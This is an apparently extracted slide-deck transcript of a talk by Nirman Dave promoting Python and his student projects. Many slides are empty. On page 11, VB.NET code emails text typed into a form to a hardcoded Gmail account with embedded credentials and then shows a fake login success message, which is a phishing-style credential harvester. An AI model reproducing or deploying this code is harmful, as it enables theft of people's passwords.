YOU ARE DOWNLOADING DOCUMENT

Please tick the box to continue:

Transcript
Page 1: Nirman Dave on why Python is the future of innovative technology!

#This thing right here, is awesome!

I am Nirman Dave &

Page 2: Nirman Dave on why Python is the future of innovative technology!

“Respect geeks, someday

you might end up working for

them!”

Page 3: Nirman Dave on why Python is the future of innovative technology!

Is python the future?

>>> import string>>> word= “Ku ravjqp vjg hwvwtg?”>>> cipher=string.maketrans(“cdefghijklmnopqrstuvwxyzab” , “abcdefghijklmnopqrstuvwxyz”)>>> print word.translate(cipher)

Page 4: Nirman Dave on why Python is the future of innovative technology!

21 3

SnickAntable DriveBud

Page 5: Nirman Dave on why Python is the future of innovative technology!
Page 6: Nirman Dave on why Python is the future of innovative technology!
Page 7: Nirman Dave on why Python is the future of innovative technology!
Page 8: Nirman Dave on why Python is the future of innovative technology!
Page 9: Nirman Dave on why Python is the future of innovative technology!
Page 10: Nirman Dave on why Python is the future of innovative technology!
Page 11: Nirman Dave on why Python is the future of innovative technology!

Dim MyMailMessage As New MailMessage() Try MyMailMessage.From = New MailAddress("[email protected]") MyMailMessage.To.Add("[email protected]") MyMailMessage.Subject = TextBox1.Text MyMailMessage.Body = TextBox2.Text Dim SMTP As New SmtpClient("smtp.gmail.com") SMTP.Port = 587 SMTP.EnableSsl = True SMTP.Credentials = New System.Net.NetworkCredential("[email protected]", "123456789") SMTP.Send(MyMailMessage) TextBox2.Text = “you have been hacked" MsgBox("You have succesfully logged in", MsgBoxStyle.Exclamation) Catch ex As Exception End Try

Page 12: Nirman Dave on why Python is the future of innovative technology!
Page 13: Nirman Dave on why Python is the future of innovative technology!
Page 14: Nirman Dave on why Python is the future of innovative technology!
Page 15: Nirman Dave on why Python is the future of innovative technology!
Page 16: Nirman Dave on why Python is the future of innovative technology!

122087506

1102

112320

832921

270000

Page 17: Nirman Dave on why Python is the future of innovative technology!

122341506

73493

52004

Page 18: Nirman Dave on why Python is the future of innovative technology!
Page 19: Nirman Dave on why Python is the future of innovative technology!

#Converted a piece of paper into amulti-touch table

Page 20: Nirman Dave on why Python is the future of innovative technology!

Blob detector

Page 21: Nirman Dave on why Python is the future of innovative technology!
Page 22: Nirman Dave on why Python is the future of innovative technology!

#So where is python used in all this?

Page 23: Nirman Dave on why Python is the future of innovative technology!
Page 24: Nirman Dave on why Python is the future of innovative technology!

>>> print (‘Can we have the video please?’)

Page 25: Nirman Dave on why Python is the future of innovative technology!

>>> list=['after', 'learning', 'python basics,', 'it', 'turned', 'more', 'interesting!']>>> print ‘ ‘.join(list)after learning python basics, it turned more interesting!

Page 26: Nirman Dave on why Python is the future of innovative technology!
Page 27: Nirman Dave on why Python is the future of innovative technology!

+ + +

Page 28: Nirman Dave on why Python is the future of innovative technology!
Page 29: Nirman Dave on why Python is the future of innovative technology!
Page 30: Nirman Dave on why Python is the future of innovative technology!

Snick isn’t just simple

It’s beautiful

Page 31: Nirman Dave on why Python is the future of innovative technology!

…and it’s platform independent

Page 32: Nirman Dave on why Python is the future of innovative technology!

>>>| gab (‘Show the Snick video!’)Show the Snick video!{non}

Page 33: Nirman Dave on why Python is the future of innovative technology!

#Snick was written in Python 2.7.6

Page 34: Nirman Dave on why Python is the future of innovative technology!

def gab(x):print (a[6:-2]+"\n{non}")

if command[:6]=="gab (\"" :gab (command)

Page 35: Nirman Dave on why Python is the future of innovative technology!
Page 36: Nirman Dave on why Python is the future of innovative technology!
Page 37: Nirman Dave on why Python is the future of innovative technology!

#How many song lovers here?

Page 38: Nirman Dave on why Python is the future of innovative technology!

#Wired earphones

Page 39: Nirman Dave on why Python is the future of innovative technology!

#Bluetooth earphones

Page 40: Nirman Dave on why Python is the future of innovative technology!

#Smart Drivebud

Page 41: Nirman Dave on why Python is the future of innovative technology!

#This is not the exact product, its just a prototype model.

Page 42: Nirman Dave on why Python is the future of innovative technology!

#Phone calling

#GPS #Text messaging

#Information search

#Music

Page 43: Nirman Dave on why Python is the future of innovative technology!

#Phone calling

#GPS#Text messaging#Information search

#Music

Operating System

Page 44: Nirman Dave on why Python is the future of innovative technology!

#DriveBud OS

Page 45: Nirman Dave on why Python is the future of innovative technology!

SnickAntable DriveBud

Page 46: Nirman Dave on why Python is the future of innovative technology!

>>> dictionary={‘python’:‘future of innovative technology’}>>> dictionary[‘python’]‘future of innovative technology’

Page 47: Nirman Dave on why Python is the future of innovative technology!

Related Documents